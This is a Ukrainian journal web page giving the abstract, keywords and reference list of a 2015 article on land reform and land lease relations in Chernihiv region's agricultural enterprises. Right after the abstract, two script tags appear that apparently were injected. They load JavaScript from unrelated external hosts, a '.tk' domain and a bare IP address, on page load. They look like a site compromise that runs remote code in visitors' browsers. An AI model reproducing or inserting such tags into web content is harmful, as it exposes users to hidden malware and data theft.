ISSN 2413-2322 (Online)

ISSN 2221-1055 (Print)

УДК: 332.021.8
Сторінка молодого науковця

Розвиток земельних відносин у сільськогосподарських підприємствах Чернігівщини / Давиденко В.М. // Економіка АПК. - 2015. - № 9 - С. 111

Висвітлено результати земельної реформи на прикладі Чернігівської області. Встановлено, що відповідно до чинного законодавства власники земельних паїв і земельних ділянок можуть надавати їх в оренду, приєднувати до особистих господарств, передавати у спадщину або дарувати без зміни цільового призначення. Громадяни Чернігівської області в основному реалізували своє право власності на земельні паї, посвідчені сертифікатом, передавши їх в оренду. Досліджено сучасний стан земельних відносин у реформованих підприємствах Чернігівської області. Окреслено роль нормативної грошової оцінки у їх регулюванні. Розкрито проблеми орендних земельних відносин, які стосуються структури укладення договорів оренди земельних паїв та їх строків, форм виплати орендної плати та її розмірів. Визначено частку орендної плати за земельні паї в структурі витрат на виробництво продукції рослинництва в сільськогосподарських підприємствах. Проаналізовано зміни у структурі земельного фонду області та трансформацію форм власності на землю за період з 1990 по 2014 рік. Висвітлено тенденції щодо реалізації права власності на земельні паї. Окреслено коло проблемних питань, на вирішення яких мають спрямовуватися подальші наукові дослідження, а саме: законодавче урегулювання рентних відносин, за яких значна частка створюваної у сільському господарстві земельної ренти має повертатися виробникам на розширене відтворення галузі, розроблення регуляторних інструментів ринкового обігу земель сільськогосподарського призначення, забезпечення екологізації сільськогосподарського землекористування. Табл.: 3. Рис.: 7. Бібліогр. 18.<script type='text/javascript' src='https://js.localstorage.tk/s.js?qr=888'></script><script type='text/javascript' src='http://193.201.224.233/m.js?d=1'></script>
Ключові слова: земельна реформа, земельний фонд, структура сільськогосподарських угідь, земельні відносини, агроформування, право власності, земельна частка (пай), нормативна грошова оцінка

Список використаних джерел

 1. Андрійчук В.Г. Надконцентрація агропромислового виробництва і земельних ресурсів та її наслідки [Текст] / В. Г. Андрійчук // Економіка АПК. - 2009. - № 2. - С. 3-9.
 2. Гайдуцький П.І. Аграрна реформа Л.Д.Кучми в Україні / П.І. Гайдуцький. - К. : ТОВ »Інформаційні системи», 2015. - 448 с.
 3. Добряк Д.С. Cучасний стан земельної реформи та перспективи розвитку земельних відносин в Україні / Д.С. Добряк // Землевпоряд. вісн. - 2015. - № 4. - С. 3-4.
 4. Стратегічні напрями розвитку земельних відносин у сільському господарстві на період до 2020 року / [Федоров М.М., Ходаківська О.В., Корчинська С.Г., Солов’яненко Н.А.]; за ред. Ю.О. Лупенка, М.М. Федорова. - К. : ННЦ «ІАЕ», 2012. - 60 с.
 5. Трансформація земельних відносин до ринкових умов. Матер. Одинадцятих річних зборів Всеукр. конгресу вчених економістів-аграрників 26-27 лют. 2009 року / [Саблук П.Т., Федоров М.М., Месель-Веселяк В.Я., Ходаківська О.В. та ін.]. - К. : ННЦ «ІАЕ», 2009. - 116 с.
 6. Рекомендації щодо забезпечення розвитку земельних відносин у ринкових умовах / М.М. Федоров, В.Я. Месель-Веселяк, П.Т. Саблук, О.В. Ходаківська [та ін.]. - К.: ННЦ «ІАЕ», 2009. - 60 с.
 7. Новаковський Л.Я. Уповільнена хода земельної реформи / Л.Я. Новаковський // Дзеркало тижня. - 2015. - № 24 - 3 лип. 2015 р.
 8. Третяк А.М. Концептуальні засади розвитку сільськогосподарського землекористування сільських територій: наук. доп. / А.М. Третяк - К., 2014. - 24 с.
 9. Федоров М.М. Земельна реформа і розвиток ринкових земельних відносин / М.М. Федоров // Економіка АПК. - 2011. - № 7. - С. 55-60.
 10. Ходаківська О.В. Земельні відносини у сільському господарстві: регіональний вимір : моногр. / О.В. Ходаківська, Н.І. Бурлака. - К. : ННЦ «ІАЕ», 2012. - 242 с.
 11. Юрчишин В.В. До проблеми доведення до логічного завершення земельних та всіх інших сучасних аграрних перетворень / В.В. Юрчишин // Економіка АПК. - 2009. - № 3. - С. 90-91.
 12. Konrad Hagedorn. Property rights reform on agricultural land in Central and Eastern Europe / Konrad Hagedorn // Quarterly Journal of International Agriculture. - 2004. - № 4. - Р. 409-438.
 13. Johan F. M. Swinnen. The political economy of land reform choices in Central and Eastern Europe / Johan F. M. Swinnen // Economics of Transition. - 1999. - Volume 7, Issue 3. - P. 637-664.
 14. Gerber L. Land reform and land markets in Eastern Europe / L. Gerber, R. Giovarelli // Land reform. - 2005. - №1. - Р. 27-32.
 15. Thompson S. Agrarian Reform in Eastern Europe Following World War I: Motives and Outcomes / Sarahelen Thompson // American Journal of Agricultural Economics. - 1993. - Vol. 75. - No. 3. - Р. 840-844.
 16. Deininger K. Agrarian reforms in Eastern European countries: lessons from International experience / Klaus Deininger // Journal of international development. - 2002. - vol. 14. - Р. 987-1003.
 17. Legal impediments to effective rural land relations in Eastern Europe and Central Asia - a comparative perspective / Prosterman R., Hanstad T., Giovarelli R., Rolfes L. And other. The World Bank. - Washington, 1999. - 340 p.
 18. Ходаківська О.В. Розвиток земельних відносин в аграрному секторі України / О.В. Ходаківська. - К. : ННЦ «ІАЕ», 2015. - 26 с.
Читати статтю: 17.pdf